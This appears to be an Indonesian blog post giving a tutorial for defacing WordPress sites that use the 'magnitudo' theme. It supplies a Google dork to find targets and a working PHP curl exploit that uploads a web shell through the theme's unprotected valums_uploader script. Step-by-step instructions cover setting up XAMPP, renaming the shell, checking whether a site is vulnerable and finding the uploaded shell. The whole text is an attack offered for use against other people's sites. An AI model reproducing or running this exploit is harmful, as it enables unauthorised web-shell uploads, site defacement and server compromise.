Google Dork : inurl:wp-content/themes/magnitudo Use your brain untuk menemukan dork lainnya :)
Exploit :
<?php$uploadfile="shell.php";$ch = curl_init("http://site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php");curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS,        array('qqfile'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult";?>Pertama download XAMMP nya HERE HERE
Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini
Lalu tekan Control F dan ketikkan "curl" tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..
Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php
Simpan di folder xammp -> xammp -> PHP
Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP
Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi
$uploadfile="shell.php"; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))
Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi
Ex : http:/www.site.com/
Lalu tambahkan dengan exploitnya
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.phpJika Ada Error Files Upload  berarti itu vuln .
Buka exploitnya kamu copy semuanya ke exploit tadi 
Lalu buka CMD , 
Ketikkan cd xammp enter >> cd php enter
Jika succes , filenya akan berada disini
http://site.com/wordpress/wp-content/uploads/2013/10/x.phpSekian dulu Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability Semoga bermanfaat :)



 
 
 
 
 
 
 
 
0 komentar:
Posting Komentar